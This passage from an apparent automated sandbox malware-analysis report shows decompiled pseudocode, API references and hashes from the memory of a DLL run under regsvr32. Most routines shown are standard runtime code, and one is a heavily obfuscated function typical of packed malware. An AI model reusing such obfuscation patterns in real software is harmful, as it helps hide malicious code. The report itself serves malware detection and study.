            									_t162 =  *_t272;
            									__eflags =  *(_t162 + 4);
            									if( *(_t162 + 4) == 0) {
            										__eflags = _t235 - _t258;
            										if(_t235 <= _t258) {
            											goto L49;
            										}
            									}
            								}
            							} else {
            								__eflags = _t222 - 4;
            								if(_t222 == 4) {
            									goto L46;
            								}
            							}
            						}
            						asm("sbb edi, edi");
            						_t271 =  ~_t269 & 0x00000002;
            						__eflags = _t271;
            						return _t271;
            					} else {
            						__eflags = _t218 - 4;
            						if(_t218 == 4) {
            							goto L34;
            						} else {
            							_t173 =  *_t272;
            							__eflags =  *(_t173 + 4);
            							if( *(_t173 + 4) != 0) {
            								goto L34;
            							} else {
            								_t88 = _t272 + 0x5c; // 0x35e85000
            								__eflags = _t254 -  *_t88;
            								if(_t254 !=  *_t88) {
            									goto L34;
            								} else {
            									return 1;
            								}
            							}
            						}
            					}
            				} else {
            					return 3;
            				}
            			}
            0x027b4425
            0x027b4427
            0x027b4427
            0x027b4428
            0x027b4428
            0x027b4433
            0x027b4433
            0x027b4433
            0x027b4436
            0x027b4439
            0x027b4439
            0x027b443c
            0x027b443c
            0x027b43ff
            0x027b443f
            0x027b4442
            0x027b4445
            0x027b4447
            0x027b444a
            0x027b444c
            0x027b444f
            0x027b4452
            0x027b4454
            0x027b4457
            0x027b445f
            0x027b4467
            0x027b446a
            0x027b446a
            0x027b446a
            0x027b446d
            0x027b446d
            0x027b446d
            0x027b4470
            0x027b4476
            0x027b4478
            0x027b4478
            0x027b447e
            0x027b4484
            0x027b448d
            0x027b4494
            0x027b4496
            0x027b4499
            0x027b4499
            0x027b449c
            0x027b449c
            0x027b449f
            0x027b44a1
            0x027b44a4
            0x027b44a6
            0x027b44c1
            0x027b44c1
            0x027b44c5
            0x027b44c8
            0x027b44cb
            0x027b44ce
            0x027b44e4
            0x027b44e4
            0x027b44e4
            0x027b44d0
            0x027b44d0
            0x027b44d2
            0x027b44d6
            0x027b44d9
            0x00000000
            0x027b44db
            0x027b44db
            0x027b44dd
            0x00000000
            0x027b44df
            0x027b44df
            0x027b44df
            0x027b44dd
            0x027b44d9
            0x027b44e8
            0x027b44eb
            0x027b44f0
            0x027b44fa
            0x027b44fa
            0x027b44fa
            0x027b44fd
            0x027b44a8
            0x027b44a8
            0x027b44aa
            0x027b44b1
            0x027b44b1
            0x027b44b3
            0x027b44b5
            0x027b44b7
            0x027b44bb
            0x027b44bd
            0x027b44bf
            0x00000000
            0x00000000
            0x027b44bf
            0x027b44bb
            0x027b44ac
            0x027b44ac
            0x027b44af
            0x00000000
            0x00000000
            0x027b44af
            0x027b44aa
            0x027b4507
            0x027b4509
            0x027b4509
            0x027b4514
            0x027b43b7
            0x027b43b7
            0x027b43ba
            0x00000000
            0x027b43bc
            0x027b43bc
            0x027b43be
            0x027b43c2
            0x00000000
            0x027b43c4
            0x027b43c4
            0x027b43c4
            0x027b43c7
            0x00000000
            0x027b43cb
            0x027b43d4
            0x027b43d4
            0x027b43c7
            0x027b43c2
            0x027b43ba
            0x027b43a6
            0x027b43af
            0x027b43af

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
            • Instruction ID: 9abb05e9f6112c221adfece80d12d51b4527468e2d3e8f1c6b11d77c8ab5dc0b
            • Opcode Fuzzy Hash: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
            • Instruction Fuzzy Hash: D4D11575A006049FCB25CF6DD8E4AAAB7F5FF88304B24892DE88AC7742D731E944CB55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E6D5103C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				signed int _t34;
            				signed int _t40;
            				int _t46;
            				int _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t69;
            				signed int _t70;
            				short* _t71;
            
            				_t34 =  *0x6d55ce08; // 0x70cfd039
            				_v8 = _t34 ^ _t70;
            				E6D50B580(__ebx,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t53 =  *(_v24 + 8);
            					_t57 = _t53;
            					_a24 = _t53;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					return E6D508B95(_v8 ^ _t70);
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t69 = 0;
            					L11:
            					if(_t69 != 0) {
            						E6D509250(_t67, _t69, _t67, _t55);
            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
            						if(_t46 != 0) {
            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
            						}
            					}
            					L14:
            					E6D5104E0(_t69);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t48 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t69 = E6D50B438(_t63, _t48 & _t63);
            					if(_t69 == 0) {
            						goto L14;
            					}
            					 *_t69 = 0xdddd;
            					L9:
            					_t69 =  &(_t69[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E6D513490();
            				_t69 = _t71;
            				if(_t69 == 0) {
            					goto L14;
            				}
            				 *_t69 = 0xcccc;
            				goto L9;
            			}


            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6D50DAF1,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D510410
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D510499
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D5104AB
            • __freea.LIBCMT ref: 6D5104B4
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
            • String ID:
            • API String ID: 573072132-0
            • Opcode ID: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction ID: ef0240e1946353bac50c743b73a3b02e0c797ecb1fa255f66c55e96db10a9baa
            • Opcode Fuzzy Hash: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction Fuzzy Hash: 3731D072A0421AABEF199F6ACCC0EBE3BB5EB41310F054529EC14D6650E779CD64CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E6D50DCAB() {
            				int _v8;
            				void* __ecx;
            				void* _t6;
            				int _t7;
            				char* _t13;
            				int _t17;
            				void* _t19;
            				char* _t25;
            				WCHAR* _t27;
            
            				_t27 = GetEnvironmentStringsW();
            				if(_t27 == 0) {
            					L7:
            					_t13 = 0;
            				} else {
            					_t6 = E6D50DC74(_t27);
            					_pop(_t19);
            					_t17 = _t6 - _t27 >> 1;
            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
            					_v8 = _t7;
            					if(_t7 == 0) {
            						goto L7;
            					} else {
            						_t25 = E6D50B438(_t19, _t7);
            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
            							_t13 = 0;
            						} else {
            							_t13 = _t25;
            							_t25 = 0;
            						}
            						E6D50B3FE(_t25);
            					}
            				}
            				if(_t27 != 0) {
            					FreeEnvironmentStringsW(_t27);
            				}
            				return _t13;
            			}


            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 6D50DCB4
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D50DCD7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D50DCFD
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D50DD1F
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
            • String ID:
            • API String ID: 1993637811-0
            • Opcode ID: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction ID: 0810b439916e4b646fc2f827997c8d2e57cf25fd2439668f7fa243db4e915aac
            • Opcode Fuzzy Hash: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction Fuzzy Hash: 3E01D8776016177B6B1556BA5C8CD7B2A7DDFC7A91316011EF924C3E00EB608D0181F0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E6D50CA59(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x6d55dc90 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x6d539670 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0x70cfd03a
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}


            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId), ref: 6D50CA8B
            • GetLastError.KERNEL32(?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CA97
            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CAA5
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction ID: 86a01d814bd3c7a38d2acc67e006ba4d0be947cb9d37a03154583fbf8b7eb709
            • Opcode Fuzzy Hash: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction Fuzzy Hash: 1101A736656223AFCF26DA788C45B6677B8AF477617164E21F926D7A40D720D800C6F0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E6D50C854(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x6d55ce4c; // 0x7
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E6D50B523(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E6D50CC4A(_t25, _t36, __eflags,  *0x6d55ce4c, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E6D50C69A(_t25, _t31, 0x6d55dfbc);
            							E6D50B3FE(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E6D50B3FE();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E6D50B4E0(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x6d55ce4c; // 0x7
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E6D50B523(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E6D50CC4A(_t27, _t37, __eflags,  *0x6d55ce4c, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E6D50C69A(_t27, _t32, 0x6d55dfbc);
            									E6D50B3FE(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E6D50B3FE();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E6D50CBF4(_t25, _t37, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E6D50CBF4(_t23, _t36, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
            				}
            			}


            APIs
            • GetLastError.KERNEL32(?,7FFFFFFF,6D50B5BE,7FFFFFFF,?,?,6D50F735,00000000,-00000002,00000000,00000000,?), ref: 6D50C858
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8C0
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8CC
            • _abort.LIBCMT ref: 6D50C8D2
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: e98e8c03235287e5bf68fa41884d4c2e6d30ad6b09140a37f094b02224e8a1de
            • Instruction ID: 43e23305d1d31deae87f778f7f32cb5f55ae3ed74ba9a86c315b4dcaaab53626
            • Opcode Fuzzy Hash: e98e8c03235287e5bf68fa41884d4c2e6d30ad6b09140a37f094b02224e8a1de
            • Instruction Fuzzy Hash: 89F0A436548A0227DB1F63389C46B7A2739AFC3765F274934FA38A6E90FF60C8014138
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D509556() {
            				void* _t4;
            				void* _t8;
            
            				E6D509BB7();
            				E6D509B4B();
            				if(E6D509871() != 0) {
            					_t4 = E6D509823(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E6D5098AD();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}


            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6D509556
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6D50955B
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6D509560
              • Part of subcall function 6D509871: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6D509882
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6D509575
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction ID: d90614ca0d015046cab73c324254a7e9ee5ac060ac4e7626a7eca5fafead8629
            • Opcode Fuzzy Hash: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction Fuzzy Hash: 9BC04C5814C252501C4C6AB2726019D93141FE2A9CF8F58C1CBC157F4D8F06880A2C73
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E6D518F63() {
            				signed int _t307;
            				intOrPtr _t323;
            				signed int _t333;
            				intOrPtr _t337;
            				signed int _t376;
            				intOrPtr _t399;
            				signed int _t421;
            				intOrPtr* _t425;
            				void* _t426;
            				void* _t427;
            
            				_t337 =  *0x6d540000; // 0x2c369a8
            				 *_t425 = _t337;
            				 *((intOrPtr*)(_t337 + 0x1d8)) =  *((intOrPtr*)(_t425 + 0x4c));
            				 *((intOrPtr*)(_t425 + 0x14)) = 0x2872;
            				 *((intOrPtr*)(_t425 + 0xc)) = 0x29d1;
            				 *((intOrPtr*)(_t425 + 0x20)) = 0x1df3;
            				 *((intOrPtr*)(_t425 + 0x28)) = 0;
            				 *((intOrPtr*)(_t425 + 0x10)) = 0x1e7b;
            				 *((intOrPtr*)(_t425 + 0x18)) = 0x1eee;
            				 *((intOrPtr*)(_t425 + 0x50)) = 0x260d;
            				 *((intOrPtr*)(_t425 + 0x24)) = 0x24ad;
            				 *((intOrPtr*)(_t425 + 0x2c)) = 0x29d1;
            				 *((intOrPtr*)(_t425 + 0x1c)) = 0x29b2;
            				 *((intOrPtr*)(_t425 + 0xc)) = 0;
            				 *((intOrPtr*)(_t425 + 0x3c)) =  *((intOrPtr*)(_t425 + 0x14)) + 0x9f7;
            				 *((intOrPtr*)(_t425 + 0x18)) =  *((intOrPtr*)(_t425 + 0x5c)) - 0x71f;
            				_push( *((intOrPtr*)(_t425 + 0x24)) + 0x2fb);
            				_push( *((intOrPtr*)(_t425 + 0x34)) + 0x2749);
            				_push( *((intOrPtr*)(_t425 + 0x20)) - 0x984);
            				_push( *((intOrPtr*)(_t425 + 0x30)) + 0x7e3);
            				_push( *((intOrPtr*)(_t425 + 0x14)) + 0x1df3);
            				_push( *((intOrPtr*)(_t425 + 0x28)) - 0x140);
            				_push( *((intOrPtr*)(_t425 + 0x28)));
            				_push( *((intOrPtr*)(_t425 + 0x1c)) + 0xe15);
            				_push( *((intOrPtr*)(_t425 + 0x38)));
            				_push( *((intOrPtr*)(_t425 + 0x60)));
            				 *((intOrPtr*)(_t425 + 0x40)) = E6D506FC7();
            				 *((intOrPtr*)(_t425 + 0x54)) =  *((intOrPtr*)(_t425 + 0x54)) + 0x10b2;
            				 *((intOrPtr*)(_t425 + 0x40)) =  *((intOrPtr*)(_t425 + 0x40)) + 0x606;
            				 *((intOrPtr*)(_t425 + 0x64)) =  *((intOrPtr*)(_t425 + 0x44)) + 0xb56;
            				_push( *((intOrPtr*)(_t425 + 0x58)) - 0x6ba);
            				_push( *((intOrPtr*)(_t425 + 0x50)) - 0xb37);
            				_push( *((intOrPtr*)(_t425 + 0x48)) - 0x9f7);
            				_push( *((intOrPtr*)(_t425 + 0x4c)) - 0x73);
            				_t399 =  *((intOrPtr*)(_t425 + 0x48));
            				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2597);
            				_push(_t399);
            				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2872);
            				_push( *((intOrPtr*)(_t425 + 0x58)) + 0x524);
            				_push( *((intOrPtr*)(_t425 + 0x84)));
            				 *((intOrPtr*)(_t425 + 0x70)) = E6D50768E();
            				_t426 = _t425 + 0x4c;
            				 *((intOrPtr*)(_t399 + 0x8c)) =  *((intOrPtr*)(_t399 + 0x1f4));
            				 *((intOrPtr*)(_t426 + 0x20)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x140;
            				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x14)) + 0x28a4;
            				_push( *((intOrPtr*)(_t426 + 0x10)));
            				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x101;
            				 *((intOrPtr*)(_t426 + 0x50)) =  *((intOrPtr*)(_t426 + 0x18)) + 0x2ea5;
            				 *((intOrPtr*)(_t426 + 0x4c)) =  *((intOrPtr*)(_t426 + 0x2c)) + 0x111;
            				 *((intOrPtr*)(_t426 + 0x48)) =  *((intOrPtr*)(_t426 + 0x20)) + 0xb37;
            				 *((intOrPtr*)(_t426 + 0x44)) =  *((intOrPtr*)(_t426 + 0x28)) + 0x8ce;
            				 *((intOrPtr*)(_t426 + 0x40)) =  *((intOrPtr*)(_t426 + 0x60)) + 0x898;
            				_push( *((intOrPtr*)(_t426 + 0x18)) + 0x1e7b);
            				_push( *((intOrPtr*)(_t426 + 0x30)) - 0x10b2);
            				_push( *((intOrPtr*)(_t426 + 0x28)) + 0x102a);
            				_push( *((intOrPtr*)(_t426 + 0x34)) - 0x632);
            				_push( *((intOrPtr*)(_t426 + 0x38)) + 0x1df3);
            				_push( *((intOrPtr*)(_t426 + 0x24)));
            				_push( *((intOrPtr*)(_t426 + 0x3c)));
            				_push( *((intOrPtr*)(_t426 + 0x5c)));
            				_push( *((intOrPtr*)(_t426 + 0x64)));
            				_push( *((intOrPtr*)(_t426 + 0x6c)));
            				_push( *((intOrPtr*)(_t426 + 0x74)));
            				_push( *((intOrPtr*)(_t426 + 0x7c)));
            				_push( *((intOrPtr*)(_t426 + 0x84)));
            				_push( *((intOrPtr*)(_t426 + 0x8c)));
            				 *((intOrPtr*)(_t426 + 0x98)) = E6D502AE5();
            				 *((intOrPtr*)(_t426 + 0x7c)) =  *((intOrPtr*)(_t426 + 0x64)) + 0x4f3;
            				 *((intOrPtr*)(_t426 + 0x80)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xbc5;
            				 *((intOrPtr*)(_t426 + 0x84)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xcc0;
            				 *((intOrPtr*)(_t426 + 0x88)) =  *((intOrPtr*)(_t426 + 0x64)) - 0x505;
            				 *((intOrPtr*)(_t426 + 0x8c)) =  *((intOrPtr*)(_t426 + 0x70)) + 0x2b78;
            				_push( *((intOrPtr*)(_t426 + 0x4c)));
            				_push( *((intOrPtr*)(_t426 + 0x70)) - 0x632);
            				_push( *((intOrPtr*)(_t426 + 0x68)) + 0x4f3);
            				_push( *((intOrPtr*)(_t426 + 0x68)) - 0x505);
            				_push( *((intOrPtr*)(_t426 + 0x98)) - 0xab1);
            				_push( *((intOrPtr*)(_t426 + 0x98)) - 0x6bb);
            				_push( *((intOrPtr*)(_t426 + 0x70)) + 0x1df3);
            				_push( *((intOrPtr*)(_t426 + 0x5c)) - 0xb37);
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				 *((intOrPtr*)(_t426 + 0x98)) = E6D50391B();
            				_t427 = _t426 + 0x70;
            				if( *(_t427 + 0x14) >=  *(_t427 + 0x1c) + 0x9f7) {
            					L3:
            					_t376 =  *(_t427 + 0x10);
            					L4:
            					return  *((intOrPtr*)(_t376 + 0x15c));
            				}
            				if( *(_t427 + 0x14) >=  *(_t427 + 0x18) + 0xfffffa7b) {
            					_t333 =  *(_t427 + 0x20);
            					 *(_t427 + 0x38) = _t333;
            					if(_t333 ==  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c)) {
            						goto L3;
            					}
            					_t376 =  *(_t427 + 0x10);
            					do {
            						if( *(_t427 + 0x20) < ( *(_t427 + 0x1c) & 0x00002c90)) {
            							 *((intOrPtr*)(_t427 + 0x3c)) =  *((intOrPtr*)(_t376 + 0x104)) -  *((intOrPtr*)(_t427 + 0x24));
            							 *(_t427 + 0x40) = ( *(_t376 + 0x1d4) | 0x00002872) ^ 0x000024ad;
            							 *(_t427 + 0x44) =  *(_t427 + 0x5c) *  *(_t376 + 0xe8);
            							 *(_t427 + 0x48) =  *(_t376 + 0x74) & 0x00002749;
            							 *(_t427 + 0x50) =  *(_t427 + 0x14) +  *(_t427 + 0x5c);
            							 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x14) -  *((intOrPtr*)(_t376 + 0x90)) -  *(_t427 + 0x30);
            							 *((intOrPtr*)(_t427 + 0x54)) =  *(_t427 + 0x14) + ( *(_t427 + 0x14) ^  *(_t427 + 0x5c));
            							_t421 =  *(_t427 + 0x10);
            							_push( *( *(_t427 + 0x10) + 0x13c) &  *(_t421 + 0x1d4));
            							_push(( *(_t427 + 0x1c) ^ 0x00000a68) & 0x00001eee);
